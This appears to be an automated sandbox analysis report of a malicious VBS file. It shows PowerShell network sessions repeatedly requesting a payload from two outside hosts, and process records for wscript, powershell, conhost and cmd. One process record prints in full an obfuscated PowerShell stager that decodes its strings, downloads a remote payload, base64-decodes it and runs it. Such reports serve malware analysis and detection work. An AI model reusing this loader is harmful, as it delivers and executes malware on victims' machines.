2024-12-05 09:43:09 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:43:09 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49833 | 184.171.244.231 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:43:14 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.almrwad.com
Connection: Keep-Alive
2024-12-05 09:43:15 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:43:15 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:43:15 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49844 | 148.251.114.233 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:43:20 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.erp-royal-crown.info
Connection: Keep-Alive
2024-12-05 09:43:21 UTC | 238 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Thu, 05 Dec 2024 09:43:20 GMT
server: LiteSpeed
2024-12-05 09:43:21 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:43:21 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49860 | 184.171.244.231 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:43:26 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.almrwad.com
Connection: Keep-Alive
2024-12-05 09:43:26 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:43:26 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:43:26 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49876 | 148.251.114.233 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:43:32 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.erp-royal-crown.info
Connection: Keep-Alive
2024-12-05 09:43:32 UTC | 238 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Thu, 05 Dec 2024 09:43:32 GMT
server: LiteSpeed
2024-12-05 09:43:32 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:43:32 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49887 | 184.171.244.231 | 443 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:43:38 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
Host: www.almrwad.com
Connection: Keep-Alive
2024-12-05 09:43:38 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 09:43:38 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:43:38 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session ID:20
                                                  Source IP:192.168.2.4
                                                  Source Port:49903
                                                  Destination IP:148.251.114.233
                                                  Destination Port:443
                                                  PID:7016
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Timestamp:2024-12-05 09:43:44 UTC | Bytes transferred:98 | Direction:OUT | Data:
                                                  GET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.erp-royal-crown.info
                                                  Connection: Keep-Alive
                                                  Timestamp:2024-12-05 09:43:44 UTC | Bytes transferred:238 | Direction:IN | Data:
                                                  HTTP/1.1 404 Not Found
                                                  Connection: close
                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                  pragma: no-cache
                                                  content-type: text/html
                                                  content-length: 1251
                                                  date: Thu, 05 Dec 2024 09:43:44 GMT
                                                  server: LiteSpeed
                                                  Timestamp:2024-12-05 09:43:44 UTC | Bytes transferred:1130 | Direction:IN | Data:
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                  Timestamp:2024-12-05 09:43:44 UTC | Bytes transferred:121 | Direction:IN | Data:
                                                  Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                  Session ID:21
                                                  Source IP:192.168.2.4
                                                  Source Port:49918
                                                  Destination IP:184.171.244.23
                                                  Destination Port:443
                                                  PID:7016
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Timestamp:2024-12-05 09:43:49 UTC | Bytes transferred:89 | Direction:OUT | Data:
                                                  GET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.almrwad.com
                                                  Connection: Keep-Alive
                                                  Timestamp:2024-12-05 09:43:50 UTC | Bytes transferred:164 | Direction:IN | Data:
                                                  HTTP/1.1 404 Not Found
                                                  Date: Thu, 05 Dec 2024 09:43:50 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Timestamp:2024-12-05 09:43:50 UTC | Bytes transferred:315 | Direction:IN | Data:
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use



                                                  Target ID:0
                                                  Start time:04:41:40
                                                  Start date:05/12/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs"
                                                  Imagebase:0x7ff70dbb0000
                                                  File size:170'496 bytes
                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:04:41:40
                                                  Start date:05/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$FrankgA.romlE,ponoThirdbVar,eaC eckl Angi:FurfuPFolliaBj.rgr BrneaSy pllMgli a ugerlD,nceiNonteaClosk=.epid$SkovgU DyslnGasliyMelaetsnesetDubbaiT,dtag Ov.rsIm.untAgrar. RejosP cnopKnaldlUdstriEnalitusik,( Comb$AfblnDA.iseePer,gaquiltkBountt.arnaighanevIntuieFremfr Impie Hu.gnUheldd LufteAto a) Sile ');sanktionjtr (gaardspladsens 'Ty,hl[Re.roNGa.teeAnskutNedsa.LilleS Forde Ind rMechovHistriBronzcUdvinejalo,PQualio wi niT ksan Tr.mtTra.iMToldva U.henDe phaSpansgHybrieDecarrBottl]Inder:Mi.un:UntraSst vse B,gvcInd auGietirLselyikva,ttLout.yTamanPArgierFjo.toAnmartIntero LigncUnsweo He slFgte Sigh.=Profe Sexga[R.klaNGged eBuddhtCyclo. 
SpheSsto.leRetaxcBijouuMessirRugnii,lidft KalvyKo mePPligtrHurraoChar tPaintoH.drac SelmoAur.clpulicTBa.isyRetropSkulle Be r]Multi:im.fs:Lsel Tta celmobilsNodia1 ejs2Chart ');$Unyttigst=$Paralalia[0];$Sportshelt= (gaardspladsens 'Urinv$ ,onog Di,ul.osanoNondibvrts,aDaughlOrtho:Ek alHGoa taHirude m.ldmFraukoUnintpContar inteotomogtDereieArbeju UdensLeu.o5Una.a3Snown=scopiNLiskae Undewbalda- .limOIntimbH enejF,ktoeJack.c Ps ctSpini Lab,SFa.veyLodsns.peletSaurueFejl.mKr kk.Scal NB.screHoftetFlers.Prin,WLiti,e uwarbv,ndiCUpbuilUnsigiBel ne Causn akset');$Sportshelt+=$Udsmeltningen[1];sanktionjtr ($Sportshelt);sanktionjtr (gaardspladsens ' alvf$P.risHLaerea,raineEskadm Foreoco,iop FortrNynazo Misdt Hexye PhotuKahausFl.ve5Ne.ro3dixli.SabbaH sveseF,revaLiljedIndspe P adrFuglesPreim[Gsac $Mas.iFSkovta Paasn PoolgAntifsK,pittTili,k Panin,iheni MetavLqwbee Gir,nTri.isExend]Overa= Fisk$EretrFSkviso Fla rEnsemlElaf nConteg SkrueAirstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. 
CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi Bilil KataeP,ash(Til a$SpdbrURestin,enziyAst ot rndstlkkeriKalkbgUncoms D.satA,lur, Selv$ArbitSStrafv .jereLuskejPochosCawineAuspirTypehePs.ud)Mm.rl ';$Svejsere=$Udsmeltningen[0];sanktionjtr (gaardspladsens 'Stand$,ytotgVarkal Tr,aoBoxlibCebriaBehanlMobil:wormsRAmm,nePunits Isdee Heiim Ste,bM.cerlGrentaAcetab askl FiceeCo.on=Recon(hofmaT,ndreeStu fsElekttpickp- ButtPUnempaFunktt Adr hdegra B nkr$Barn.STt.ekvThyroeCout.j SarasTibbie S ndrUdsp.ePrimu)Vasif ');while (!$Resemblable) {sanktionjtr (gaardspladsens 'Mango$ IliogArb jlCombpo Gipsbfi keaB,litl and:BacciU InornMazareUfat lDramaa Ulf.bDampso tormrAktena Acidt Bokoe S.nslMalocyvelli=Fa gl$BlacktPennyr Brumu.akfjeH pog ') ;sanktionjtr $Frstepladserne;sanktionjtr (gaardspladsens ' Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke ');sanktionjtr (gaardspladsens ' Grap$Falkegm,ctulAppelo AnlgbForstaTory,l Tine:ElectR Slideamatrs Dre e SvavmDelinblivsrlSatyraThomibUdskilCocree wird=adapi(ReamuTKseb.eUnives A,detGhett-GhettP OrgaaPa.hytWasseh Amat .eolp$veterSIndvivAm,uleTra.sjM sstsDuffieO nirr rgfoe Forb)Outa. 
') ;sanktionjtr (gaardspladsens 'Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.sufo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ilaExsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod ') ;$Unyttigst=$Paralalia[$Venushaar];}$Relationsnavne=334162;$Fraflytter=29582;sanktionjtr (gaardspladsens 'Falu $ crosgSerielUnfenoRefrib ElspaMelanlFrame:P,votNGonotoAnsjons ptldDiseqiC pyrsS.lfus riftiSc,urpTekstaSlikmt Aa,eeLykkedRubrilAf,ejytrilr besky=Spiru .etskG SynseMaskit Subs-materCHustao.defonAnsvatMil.beSkuern B.rgtAppea Ploug$SemaeSSuspevM dlaePassejSprins Rac,ePlonkrAdmiteSound ');sanktionjtr (gaardspladsens 'Inapp$Marsigblon lAr,tho SkolbBedstaOp uslCoccy:OvergSSkorzuFireap GlazeOpmunrDal,ts Wiene .nrec No.crFl.mme rudttOmk aiP,admo OvarnScree Udvi=St,an V st[amen SStammyGenres KvabtAmo,peS.rafmSmitt.Un,ipCRespioFi,tnnPr grv Poc eG,naerSamdetcoope]hinde:Kompr:KrykhFGlendrPolyeoB.tonmVed,rBGersoaAnacas StineNon.e6 Tidl4RivalS isket.atchr bsiti rikenaltrigGenae(Co.ka$IncitNMisimothu,nnHaanddH.vegiUnr.vsSandbsWomaniKosyspProteaMaskit re.reVal,dd HulklHo,edyFet,r)Svov. 
');sanktionjtr (gaardspladsens 'Ka.kv$Ko,plg ,adelLimi.oCa cibUgenna UmenlLithi: BourAMetacrSekune Gurso Ha,dg Sup rD.staaSubsipOp.rvhpik,me oldorkonom Monst=Garni Scabr[D bleSUdtynyTapiosA.hudtBekose.edemmMarti.DibleTNeur,e S,gexSubautmorp .SkrifEDe epn SkadcMicrooPar gdF,gseiProdunBlomsgRecom]Milor:Ypsil:AngloANo.anSexarcCDriftI Ey pICadis.UnmilG acaneGuldstMurexSm rgitEft rrUdatei An inAttaigIsole(Uds.r$InterSIndisu.rtmapU,chaeTriazrTlpersFrstee Laerc oplr ObpyeNegrotUnc,nixenoloPlintnNonid)W nds ');sanktionjtr (gaardspladsens 'Bedre$Shan g misbl ingeoVestubKoorda Pettl.bebo: Nystn Quira ntipcikorh HalltB,conh MelaeProvenBoff.iRea dcAgate=deskt$ Kil,A EfterHool.e MechoAr ejgChastrHylstaUnnotpTurrihForudeA,rsdrNatur. SlhusBoissuou,lib,ventsDo.umtUnebrrGledeiFldstnHortegSvige(Lgdom$FodboRCam teForlol AnveaFoldetA.onyiCon,eoCo panTvrersPolitnSkspoa Th,uvRelegn Smele To k,Phase$EjendF kl,arServiaAllitf AfmulTyre.yAntiotOcta.tHonnreDigenrKaard)Petro ');sanktionjtr $naphthenic;"
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:2
                                                  Start time:04:41:40
                                                  Start date:05/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:3
                                                  Start time:04:41:43
                                                  Start date:05/12/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
                                                  Imagebase:0x7ff795ec0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true
